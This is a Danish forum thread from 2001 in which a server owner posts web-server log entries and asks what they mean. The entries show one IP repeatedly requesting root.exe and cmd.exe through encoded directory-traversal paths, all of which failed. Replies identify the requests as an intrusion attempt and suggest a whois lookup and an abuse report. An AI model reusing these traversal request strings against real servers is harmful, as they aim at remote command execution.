Avatar billede simonvalter Praktikant
28. september 2001 - 01:18 Der er 8 kommentarer og
1 løsning

hvad sker der her i mine logs ?

jeg fik lige kigget i mine logs ... hvad er det er foregår .. det ser lidt mistænktsomt ud..

22:40:26 62.218.23.165 GET /scripts/root.exe 404
22:40:26 62.218.23.165 GET /MSADC/root.exe 404
22:40:26 62.218.23.165 GET /c/winnt/system32/cmd.exe 404
22:40:28 62.218.23.165 GET /d/winnt/system32/cmd.exe 404
22:40:28 62.218.23.165 GET /scripts/..%5c../winnt/system32/cmd.exe 404
22:40:29 62.218.23.165 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
22:40:32 62.218.23.165 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
22:40:36 62.218.23.165 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404
22:40:36 62.218.23.165 GET /scripts/..Á../winnt/system32/cmd.exe 404
22:40:37 62.218.23.165 GET /scripts/winnt/system32/cmd.exe 404
22:40:37 62.218.23.165 GET /winnt/system32/cmd.exe 404
22:40:38 62.218.23.165 GET /winnt/system32/cmd.exe 404
22:40:38 62.218.23.165 GET /scripts/..%5c../winnt/system32/cmd.exe 404
22:40:38 62.218.23.165 GET /scripts/..%5c../winnt/system32/cmd.exe 404
22:40:39 62.218.23.165 GET /scripts/..%5c../winnt/system32/cmd.exe 404
22:40:39 62.218.23.165 GET /scripts/..%2f../winnt/system32/cmd.exe 404
Avatar billede sone Nybegynder
28. september 2001 - 01:29 #1
Det ser bestemt ikke godt ud...
Avatar billede hojben Novice
28. september 2001 - 01:33 #2
hacker.... de har forsøgt at få en dosprompt på din server.. er det din egen ip?
Avatar billede hojben Novice
28. september 2001 - 01:37 #3
her kan du se hvem der bruger det IP-nummer:

http://www.ripe.net/perl/whois?query=-L+62.218.23.165

Avatar billede hojben Novice
28. september 2001 - 01:39 #4
Avatar billede simonvalter Praktikant
28. september 2001 - 01:53 #5
nej det er ikke min ip ;)
Avatar billede simonvalter Praktikant
28. september 2001 - 01:54 #6
jeg skriver til deres abuse .. tak for hjælpen
Avatar billede Slettet bruger
28. september 2001 - 07:15 #7
Tja man skal vist ikke regne med, at det er den samme bruger, som er bag denne adresse hele tiden.

Men adressen er aktiv.
Avatar billede kimrosgaard Nybegynder
28. september 2001 - 09:35 #8
hehe..sådan ser logfilen også ud i min apache :) exploit efter exploit forsøgt lavet af wannabeehax0rs.
Avatar billede simonvalter Praktikant
09. november 2001 - 16:33 #9
jeg har undergøgt det lidt og det ser ud til at ved at få adgang til cmd.exe  kan man foretage DOS attacks .. læste lige en tutorial en packet kid havede skrevet ;)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester